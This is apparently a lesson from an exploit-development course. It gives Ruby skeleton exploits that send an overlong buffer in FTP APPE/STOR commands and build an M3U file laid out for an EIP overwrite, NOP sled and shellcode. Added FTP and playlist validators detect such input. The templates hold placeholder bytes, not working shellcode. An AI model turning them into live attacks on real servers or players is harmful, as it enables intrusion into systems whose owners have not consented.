Module 0x5 | Exploitation Kung Fu

Skeleton exploit

It is worth keeping a skeleton exploit around that you can edit and reuse quickly during exploitation, so the only parts you change per target are the connection details and the buffer.

Network base

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
require 'socket'

# Placeholder payload: a plain 2000-byte string, swapped for the real buffer later.
buffer = "A" * 2000

#--> Networking
host = ARGV[0]
port = (ARGV[1] || 21).to_i   # ARGV values are strings; default to FTP port 21
abort "Usage: #{$0} TARGET [PORT]" if host.nil?

s = TCPSocket.open(host, port)
s.recv(1024)                  # read the banner before sending the first command
puts "[+] Sending Username."
s.send("USER ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Password."
s.send("PASS ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Evil buffer..."
total  = s.send("APPE " + buffer + "\r\n", 0)   # send returns the number of bytes written
total += s.send("STOR " + buffer + "\r\n", 0)

#--> Exploit Info
puts "[+] Total exploit size: #{total} bytes."
puts "[+] Buffer length: #{buffer.size} bytes."
puts "[+] Done"

s.close
To execute it:

ruby ftp_exploit.rb [TARGET] [PORT]
Notice that some services require you to read their response (recv) before sending the next command, and some do not.
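The flip side of the skeleton above is what such a session looks like from the server's or a sensor's point of view. The following checker is an added example, not part of the original module: it parses FTP command lines, like the ones the skeleton sends, and flags arguments that are implausibly long, contain non-printable bytes, or are one long run of a single byte. The limits (MAX_ARG_LEN, MAX_RUN_LEN) and the sample session are assumptions constructed for this example.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original module: a checker that inspects FTP
# command lines (the kind the skeleton above sends) and flags arguments that are
# implausibly long, contain non-printable bytes, or are one long run of the same
# byte. The limits and the sample session are constructed for this example.

MAX_ARG_LEN = 512   # assumption: generous upper bound for a path argument
MAX_RUN_LEN = 64    # assumption: longer runs of one repeated byte look like filler

# An FTP command line: 3-4 letter verb, optional single space plus argument,
# optional CRLF. The argument may not contain CR or LF.
FTP_LINE = /\A(?<cmd>[A-Za-z]{3,4})(?: (?<arg>[^\r\n]*))?\r?\n?\z/

# Parse one line into [VERB, argument]; nil when the line is not well-formed.
def parse_ftp_line(line)
  m = FTP_LINE.match(line.b)      # .b: treat the input as raw bytes
  return nil unless m
  [m[:cmd].upcase, m[:arg].to_s]
end

# Length of the longest run of one repeated byte in str (0 for empty input).
def longest_run(str)
  best = run = 0
  prev = nil
  str.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

# Describe one command line and whether it looks suspicious.
def inspect_ftp_line(line, max_arg_len: MAX_ARG_LEN, max_run_len: MAX_RUN_LEN)
  parsed = parse_ftp_line(line)
  unless parsed
    return { cmd: nil, arg_len: line.bytesize, suspicious: true,
             reasons: ["not a well-formed FTP command line"] }
  end
  cmd, arg = parsed
  reasons = []
  reasons << "argument is #{arg.bytesize} bytes (limit #{max_arg_len})" if arg.bytesize > max_arg_len
  reasons << "argument contains non-printable bytes" if arg.bytes.any? { |b| b < 0x20 || b > 0x7e }
  run = longest_run(arg)
  reasons << "argument has a run of #{run} identical bytes" if run > max_run_len
  { cmd: cmd, arg_len: arg.bytesize, suspicious: !reasons.empty?, reasons: reasons }
end

# Run the check over every line of a captured client-to-server session and
# return only the suspicious ones.
def scan_ftp_session(lines, **limits)
  lines.map { |l| inspect_ftp_line(l, **limits) }.select { |r| r[:suspicious] }
end

# Constructed sample: the command sequence the skeleton above would produce.
SAMPLE_SESSION = [
  "USER ftp\r\n",
  "PASS ftp\r\n",
  "APPE " + "A" * 2000 + "\r\n",
  "STOR " + "A" * 2000 + "\r\n",
  "QUIT\r\n",
].freeze

if __FILE__ == $0
  scan_ftp_session(SAMPLE_SESSION).each do |r|
    puts "[!] #{r[:cmd]} (#{r[:arg_len]} byte argument): #{r[:reasons].join('; ')}"
  end
end
```

Run against the constructed session, USER, PASS and QUIT pass, while APPE and STOR are flagged for both the 2000-byte argument and the 2000-byte run of a single character. A well-formed but overlong argument and a line that is not an FTP command at all are reported separately, so a server-side limit on argument length and a sensor rule on repeated-byte runs can be tuned independently.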

File base

Creating a simple exploit file
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI

file = ARGV[0] || "exploit.m3u"

# Placeholder layout: junk, EIP overwrite, NOP sled and shellcode slot,
# each swapped for real values later.
junk  = "A" * 2000
eip   = "B" * 4
nops  = "\x90" * 8
shell = "S" * 368
exploit = junk + eip + nops + shell

File.open(file, 'wb') { |f| f.write(exploit) }   # binary mode: bytes such as \x90 are written untouched
puts "[*] Exploit size: #{exploit.bytesize}"
To execute it:

ruby m3u_exploit.rb song1.m3u
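From the consumer's side, the file the skeleton writes is a playlist whose single entry is far longer than any real path and carries raw non-printable bytes. The validator below is an added example, not part of the original module: it parses M3U text into directives and entries and refuses entries of that shape, so a player can skip them instead of loading them. The length limit (MAX_ENTRY_LEN) and the two sample playlists are assumptions constructed for this example.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original module: a small M3U playlist
# validator that rejects entries shaped like the one the skeleton above writes
# (an entry far longer than any real path, containing raw non-printable bytes).
# The length limit and the sample playlists are constructed for this example.

MAX_ENTRY_LEN = 1024   # assumption: longest path or URL a player should accept

# Split playlist text into directive lines (#EXTM3U, #EXTINF:...) and entry
# lines (paths or URLs), each tagged with its 1-based line number.
def parse_m3u(text)
  directives = []
  entries = []
  text.b.each_line.with_index(1) do |raw, no|
    line = raw.chomp               # strips LF or CRLF
    next if line.empty?
    if line.start_with?("#")
      directives << [no, line]
    else
      entries << [no, line]
    end
  end
  { directives: directives, entries: entries }
end

# Reasons an entry should be refused; an empty array means it is acceptable.
def check_entry(line, max_len = MAX_ENTRY_LEN)
  reasons = []
  reasons << "entry is #{line.bytesize} bytes (limit #{max_len})" if line.bytesize > max_len
  reasons << "entry contains non-printable bytes" if line.bytes.any? { |b| b < 0x20 || b > 0x7e }
  reasons
end

# Validate a whole playlist. Returns the accepted entries plus a list of
# problems, so a consumer can skip bad entries rather than loading them.
def validate_m3u(text, max_len = MAX_ENTRY_LEN)
  parsed = parse_m3u(text)
  accepted = []
  problems = []
  parsed[:entries].each do |no, line|
    reasons = check_entry(line, max_len)
    if reasons.empty?
      accepted << line
    else
      reasons.each { |r| problems << { line: no, reason: r } }
    end
  end
  { ok: problems.empty?, accepted: accepted, problems: problems }
end

# Constructed samples: a normal playlist and one shaped like the skeleton's output.
GOOD_PLAYLIST = "#EXTM3U\n#EXTINF:123,Sample Song\nsong1.mp3\nhttp://example.invalid/song2.mp3\n"
BAD_PLAYLIST  = ("#EXTM3U\n" + "A" * 2000 + "B" * 4 + "\x90" * 8 + "S" * 368 + "\n").b

if __FILE__ == $0
  [GOOD_PLAYLIST, BAD_PLAYLIST].each do |pl|
    res = validate_m3u(pl)
    if res[:ok]
      puts "[+] accepted #{res[:accepted].size} entries"
    else
      puts "[!] " + res[:problems].map { |p| "line #{p[:line]}: #{p[:reason]}" }.join("; ")
    end
  end
end
```

The good playlist yields two accepted entries and no problems; the one shaped like the skeleton's output is refused on line 2 for both its size and its non-printable bytes. Working on the raw bytes (`.b`) matters here: a validator that decodes the file as UTF-8 first would raise on the `\x90` bytes before it ever got to apply its own checks.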